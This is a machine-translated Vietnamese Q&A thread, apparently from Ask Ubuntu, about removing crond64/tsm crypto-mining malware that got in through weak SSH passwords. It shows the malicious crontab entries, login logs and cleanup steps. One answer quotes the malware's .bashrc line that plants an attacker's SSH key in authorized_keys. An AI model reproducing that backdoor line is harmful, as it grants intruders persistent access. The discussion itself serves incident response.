virus crond64 / tsm trong Ubuntu

14

Gần đây tôi nhận thấy máy chủ nhà của tôi bị chậm một cách đau đớn. Tất cả các tài nguyên đã bị ăn mòn bởi hai quá trình: crond64và tsm. Mặc dù tôi liên tục giết chúng, chúng cứ xuất hiện liên tục.

Đồng thời, ISP của tôi đã thông báo cho tôi về việc lạm dụng bắt nguồn từ địa chỉ IP của tôi:

==================== Excerpt from log for 178.22.105.xxx====================
Note: Local timezone is +0100 (CET)
Jan 28 20:55:44 shared06 sshd[26722]: Invalid user admin from 178.22.105.xxx
Jan 28 20:55:44 shared06 sshd[26722]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=178.22.105.xxx
Jan 28 20:55:45 shared06 sshd[26722]: Failed password for invalid user admin from 178.22.105.xxx port 33532 ssh2
Jan 28 20:55:46 shared06 sshd[26722]: Received disconnect from 178.22.105.xxx port 33532:11: Bye Bye [preauth]
Jan 28 20:55:46 shared06 sshd[26722]: Disconnected from 178.22.105.xxx port 33532 [preauth]
Jan 28 21:12:05 shared06 sshd[30920]: Invalid user odm from 178.22.105.xxx
Jan 28 21:12:05 shared06 sshd[30920]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=178.22.105.xxx
Jan 28 21:12:07 shared06 sshd[30920]: Failed password for invalid user odm from 178.22.105.xxx port 45114 ssh2
Jan 28 21:12:07 shared06 sshd[30920]: Received disconnect from 178.22.105.xxx port 45114:11: Bye Bye [preauth]
Jan 28 21:12:07 shared06 sshd[30920]: Disconnected from 178.22.105.xxx port 45114 [preauth]

Tôi đã nhận được thông báo rằng trang web này có thể có vi-rút. Tôi chạy Sophos AV quét toàn bộ ổ cứng của tôi và thực sự nó đã tìm thấy một số virus /tmp/.mountfs/.rsync. Vì vậy, tôi đã xóa toàn bộ thư mục và nghĩ rằng đây là nó. Nhưng nó tiếp tục quay trở lại sau đó. Sau đó, tôi đã kiểm tra tệp cron của người dùng /var/spool/cron/crontabs/kodi(virus đang chạy bằng người dùng của máy chủ phương tiện của tôi kodi), trông giống như sau:

# DO NOT EDIT THIS FILE - edit the master and reinstall.
# (cron.d installed on Sun Feb  3 21:52:03 2019)
# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
* */12 * * * /home/kodi/.ttp/a/upd>/dev/null 2>&1
@reboot /home/kodi/.ttp/a/upd>/dev/null 2>&1
5 8 * * 0 /home/kodi/.ttp/b/sync>/dev/null 2>&1
@reboot /home/kodi/.ttp/b/sync>/dev/null 2>&1
#5 1 * * * /tmp/.mountfs/.rsync/c/aptitude>/dev/null 2>&1

Có vẻ như, virus đang tự kích hoạt lại mỗi lần từ một thư mục khác. Nội dung của thư mục đó là:

>>> ls /home/kodi/.ttp/*
/home/kodi/.ttp/cron.d  /home/kodi/.ttp/dir2.dir

/home/kodi/.ttp/a:
a  bash.pid  config.txt  crond32  crond64  cronda  crondb  dir.dir  pools.txt  run  stop  upd

/home/kodi/.ttp/b:
a  dir.dir  rsync  run  stop  sync

/home/kodi/.ttp/c:
aptitude  dir.dir  go  ip  lib  n  p  run  slow  start  stop  tsm  tsm32  tsm64  v  watchdog

Tôi đã xóa tất cả các tệp này và các mục trong crontab và hy vọng với điều này, vấn đề đã được giải quyết. Tuy nhiên, tôi sẽ quan tâm đây là virus gì, làm thế nào tôi có thể bắt được nó (nó có thể được kết nối với Kodi) và tôi có thể làm gì để ngăn chặn nó. May mắn thay, nó chỉ chạy từ một người dùng có quyền hạn chế, nhưng vẫn khó chịu khi xử lý.

BIÊN TẬP

Mặc dù tôi dường như đã loại bỏ tất cả phần còn lại của vi-rút này (tôi cũng đã xóa toàn bộ thư mục tmp), vi-rút vẫn tiếp tục quay trở lại. Tôi nhận ra rằng có một mục trong ~/.ssh/authorized_hostsđó, mà tôi chắc chắn không đặt mình vào. Điều này giải thích làm thế nào virus có thể được trồng lại nhiều lần. Tôi đã xóa mục nhập, đăng nhập bị vô hiệu hóa cho người dùng đó, đăng nhập mật khẩu bị vô hiệu hóa (chỉ mật mã) và sử dụng một cổng không chuẩn ngay bây giờ.

Tôi cũng nhận thấy các lần đăng nhập lặp đi lặp lại trên máy chủ của mình với tên người dùng ngẫu nhiên, có thể là do một loại bot nào đó (nhật ký trông giống như đáng kinh ngạc với lần khởi chạy từ IP của tôi, được gửi bởi ISP của tôi). Tôi đoán đó là cách máy tính của tôi bị nhiễm ngay từ đầu.

malware antivirus

— erik
nguồn

4

Hãy nhớ rằng nếu bạn đã bị hack một lần, rất có thể có những thứ khác ở trên đĩa bị nhiễm hoặc vi phạm. Bạn có lẽ nên thổi bay hệ thống và xây dựng lại nó. Virus rất hiếm khi chỉ ảnh hưởng đến một ứng dụng và thường lây lan trên đĩa.

— Thomas Ward

Tôi đồng ý! nếu ai đó truy cập vào hệ thống của bạn, hãy xóa sạch hệ thống và khôi phục bản sao lưu hệ thống

— Rinzwind

Chắc chắn, đây sẽ là giải pháp tiết kiệm. Nhưng tôi vừa cài đặt lại hệ thống này và không muốn cài đặt lại mà không hiểu chuyện gì đã xảy ra. Bằng cách sao chép các tập tin qua, điều này có thể đã bắt đầu lại và tôi sẽ lãng phí thời gian của mình.

— erik

Có khả năng, hệ thống của bạn đã bị vi phạm do đó làm thế nào virus tiếp tục bị tái nhiễm. Tôi sẽ nuke hệ thống và bắt đầu lại từ mới.

— Thomas Ward

1

Tôi cũng tìm thấy sự lây nhiễm vào tập tin .bashrc của người dùng :

cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB... ...VKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod 700 .ssh && cd .ssh && chmod 600 authorized_keys && cd ~

. Tôi chỉ làm một cp /etc/skel/.bashrc /home/mycompromiseduser/để loại bỏ nó.

— letjump

6

Tôi đã có cùng. Dịch vụ đã cài đặt rsync và có một số tệp. Tôi tìm thấy một dota.tar.gztập tin trong thư mục người dùng.

từ chối cổng 22 đi trong tường lửa (ví dụ ufw deny out 22)
pkill -KILL -u kodi (điều này giết chết tất cả các quy trình đang chạy của người dùng kodi)
deluser kodi
xóa userhome
xóa rsync (Tôi không sử dụng cái này)
tẩy /tmp/.mountfs*

Xin lưu ý điều này có thể sẽ làm hỏng mọi thứ cho kodi. Thay vì xóa toàn bộ userhome, có lẽ bạn chỉ có thể xóa dota.tar.gz(nếu có) và .ttpthư mục (đừng quên làm sạch crontab!)

Sau khi khởi động lại, tôi không thấy bất kỳ kết nối gửi nào nữa (kiểm tra với:

netstat -peanut | grep 22

Nhiễm trùng xảy ra thông qua người dùng có mật khẩu yếu (tài khoản kodi có mật khẩu mặc định có thể?)

— Sjors Nijhuis
nguồn

1

Tôi đã có cùng một phần mềm độc hại. Mục nhập thông qua mật khẩu người dùng chưa lưu thông qua ssh (cổng không mặc định), đã được phát hiện và xóa sau khoảng 24 giờ.

Trong trường hợp của tôi, xóa crontab của người dùng, rm -rdf /tmp/.*, rm -rdf /home/user/.*, killall -u userlà đủ.

— sau cùng
nguồn

1

Có điều này ngày hôm nay. Tôi đã kiểm tra hệ thống và thấy hệ thống của tôi có dấu vết trong khoảng một tháng và tôi đã không nhận ra rằng thứ này đã ở đó cho đến khi ISP của tôi thông báo cho tôi.

Phần mềm độc hại xuất hiện thông qua người dùng không an toàn với mật khẩu yếu. Trong trường hợp của tôi đó là người sử dụng timemachine. Nhật ký thâm nhập trông như thế này.

98341:Dec 23 23:45:36 fileserver sshd[23179]: Accepted password for timemachine from 46.101.149.19 port 45573 ssh2

Đây là công cụ khai thác XMRIG và một công cụ khai thác quét các IP khác cho cùng các điểm yếu. Vì vậy, một máy có thể lây nhiễm hàng chục người khác. Bạn có thể xem báo cáo của MS về cuộc tấn công mạng này .

Bảo vệ hiệu quả nhất khỏi loại tấn công này là cài đặt fail2bantrên máy chủ của bạn, truy cập ssh giới hạn tỷ lệ ufwvà sử dụng ACL danh sách trắng cho các hệ thống có thể truy cập SSH trên máy chủ của bạn.

— La Mã Savrulin
nguồn

0

Trong trường hợp của tôi, nguồn lây nhiễm là một người dùng không thay đổi mật khẩu không an toàn của anh ta từ khi tôi tạo tài khoản của anh ta (tất nhiên tôi đã nói với anh ta). Máy chủ của tôi có thể nằm trong một số danh sách: tôi nhận được khoảng 1000 lượt cấm mỗi tuần từ fail2ban (thử 4 lần với một người dùng hoặc mật khẩu sai và bị chặn trong một tháng)

— Sjors Nijhuis
nguồn

0

Đây là giải pháp của tôi (cũng có tên là phần mềm độc hại khai thác crypo):

làm việc với crontab
làm sạch bất cứ điều gì mô tả công việc crontab này chỉ đến: /home/xxx/.ttp/a/upd>/dev/null 2> & 1
xóa /tmp/.xxx/.rsync/c/aptitude>/dev/null 2> & 1
điều quan trọng nhất (tôi phải mất một chặng đường dài để đến đó), nếu không nó sẽ tiếp tục quay trở lại: chạy crontab -e (với người dùng này) bạn sẽ tìm thấy công việc crontab ở trên, xóa tất cả chúng, lưu nó.
thay đổi số cổng.

— Mít Ma
nguồn